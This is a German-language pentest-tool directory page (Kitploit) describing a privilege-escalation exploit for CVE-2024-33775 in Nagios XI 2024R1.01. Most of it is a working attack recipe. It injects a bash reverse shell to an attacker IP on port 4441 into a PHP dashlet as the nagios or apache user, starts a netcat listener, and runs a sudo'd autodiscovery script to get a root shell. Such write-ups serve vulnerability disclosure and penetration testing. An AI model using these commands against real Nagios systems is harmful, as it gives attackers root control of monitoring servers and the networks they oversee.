Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-33775 — Privilege-Escalation-Exploit für Nagios XI 2024R1.01, der vollständigen Root-Zugriff von NAGIOS- oder APACHE-Benutzern durch bösartige RSS-Dashlet-Injektion und sudo-Befehlsausführung ermöglicht. | Kitploit
Tools/GitHubGitHub/neo-xed/cve-2024-33775
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Privilege-Escalation-Exploit für Nagios XI 2024R1.01, der vollständigen Root-Zugriff von NAGIOS- oder APACHE-Benutzern durch bösartige RSS-Dashlet-Injektion und sudo-Befehlsausführung ermöglicht.

Repository anzeigen
8vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE entdeckt von: K. Wahab (Neo`X)

Details zur Sicherheitslücke:

  • Produkt: Nagios XI Version 2024R1.01
  • Sicherheitslücke: Privilegieneskalation von Benutzern "NAGIOS" oder "APACHE"
  • Ergebnis: Vollständiger Root-Zugriff auf das Zielsystem
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

Exploit:

In diesem Beispiel wird das RSS-Dashlet verwendet.

1. Erstellen einer neuen Instanz von Nagios XI:

  • Sie können die Nagios XI Version 2024R1.01 OVA-Datei herunterladen von: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. Privilegieneskalation:

Exploit als NAGIOS:

  • Fügen Sie in der Datei dashlet .inc.php im Verzeichnis "/usr/local/nagiosxi/html/includes/dashlets/" den folgenden Inhalt ein:
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • Starten Sie einen Netcat-Listening-Server auf dem Angreifer-Rechner:
nc -nlvp 4441
  • Führen Sie den folgenden Befehl aus, um Privilegien zu eskalieren und eine Verbindung als root zu erhalten:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

Exploit als APACHE:

  • Gehen Sie auf die Verwaltungsseite für "Dashlets" und laden Sie ein Dashlet herunter:

    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • Ändern Sie die *.inc.php:

    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • Starten Sie einen Netcat-Listening-Server auf dem Angreifer-Rechner:
nc -nlvp 4441
  • Laden Sie das schädliche Dashlet auf der Verwaltungsseite für Dashlets hoch und warten Sie auf eine Verbindung als APACHE-Benutzer.
  • Führen Sie den folgenden Befehl aus, um Privilegien zu eskalieren und eine Verbindung als root zu erhalten:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(Hinweis: Nach dem Ausführen des Befehls erhalten Sie eine Verbindung als APACHE, verwenden Sie STRG+C, um den Listener zu beenden und mehrmals neu zu starten)

Apache_root

Tool herunterladen